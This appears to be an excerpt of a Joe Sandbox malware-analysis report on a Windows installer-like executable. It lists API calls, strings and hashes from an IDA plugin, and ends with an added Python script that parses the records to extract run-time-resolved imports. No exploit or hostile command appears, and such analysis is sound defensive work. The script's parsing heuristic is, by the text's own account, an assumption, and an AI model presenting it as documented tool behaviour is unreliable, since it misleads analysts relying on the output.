                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 395431579-1506664499
                                                                                            • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                            • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                            • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                            Strings
                                                                                            • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                            • PendingFileRenameOperations, xrefs: 00455A40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                            • API String ID: 47109696-2115312317
                                                                                            • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                            • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                            • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                            • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                            • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                            • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                            • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                            • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                            • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                            • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                            APIs
                                                                                            • GetMenu.USER32(00000000), ref: 00421361
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu
                                                                                            • String ID:
                                                                                            • API String ID: 3711407533-0
                                                                                            • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                            • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                            • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 601730667-0
                                                                                            • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                            • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                            • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2698912916-0
                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                            • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                            Strings
                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$BuffersFlush
                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                            • API String ID: 3593489403-659731555
                                                                                            • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                            • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                            • String ID: hX
                                                                                            • API String ID: 296031713-463809249
                                                                                            • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                            • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                            • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                            • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                            APIs
                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                              • Part of subcall function 004063C4: 6FAA1CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                            • String ID: Setup
                                                                                            • API String ID: 504348408-3839654196
                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                            • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
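The record above is the one to read carefully: almost every subcall is a GetModuleHandleA or LoadLibraryA followed by GetProcAddress, i.e. imports resolved at run time rather than through the import table. The argument columns are stack slots recovered by the plugin, so the export name is not always in the second slot of the GetProcAddress line (compare the "GetProcAddress.KERNEL32(00000000,user32.dll)" entries, where the name sits on the preceding GetModuleHandleA line instead). The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses record lines in this format and lists, per calling function, the exports resolved through GetProcAddress. The input is the record above copied verbatim; the regex for the line format and the "fall back to the loader line" heuristic are assumptions about how the plugin prints its output, not documented behaviour.

```python
import re
from collections import defaultdict

# One "APIs" record line of the Joe Sandbox IDA-plugin listing, e.g.
#   • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
#   • GetCurrentThreadId.KERNEL32 ref: 004107B2
# The pattern is an assumption derived from the lines on this page.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}

# Constructed input: the record lines from this report, copied verbatim.
SAMPLE = """
• Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
• Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
• Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
• Part of subcall function 004063C4: 6FAA1CD0.COMCTL32(00498BC5), ref: 004063C4
• Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
• Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
• Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
• Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
• Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
• Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
• Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
• Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
• Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
• Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
• Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
• Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
• Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
• SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
• Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
• Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
• Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
• Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
• Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
"""


def parse_api_lines(text):
    """Return one dict per record line: sub (caller address or None), api, mod, args, ref."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" carry no call and are skipped
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({"sub": m.group("sub"), "api": m.group("api"),
                      "mod": m.group("mod"), "args": args, "ref": m.group("ref")})
    return calls


def _export_names(args):
    """Keep arguments that look like export names: not a hex stack value, not '?',
    not a module file name."""
    return [a for a in args
            if a != "?" and not HEX32.match(a) and not a.lower().endswith(".dll")]


def resolved_imports(calls):
    """Map each calling function to the export names it resolves via GetProcAddress.

    The second argument of GetProcAddress is lpProcName when the plugin recovered
    it; when that slot holds a module name or a hex value instead, the name is
    taken from the most recent GetModuleHandle/LoadLibrary line of the same caller.
    This fallback is a heuristic assumed here, not documented plugin behaviour.
    """
    found = defaultdict(list)
    pending = {}  # caller -> export-like names seen on its last loader line
    for c in calls:
        caller = c["sub"] or "<self>"
        if c["api"] in LOADERS:
            pending[caller] = _export_names(c["args"])
        elif c["api"] == "GetProcAddress":
            names = _export_names(c["args"][1:2]) or pending.get(caller, [])[:1]
            for n in names:
                if n not in found[caller]:
                    found[caller].append(n)
    return dict(found)


if __name__ == "__main__":
    for caller, names in sorted(resolved_imports(parse_api_lines(SAMPLE)).items()):
        print(caller, ", ".join(names))
```

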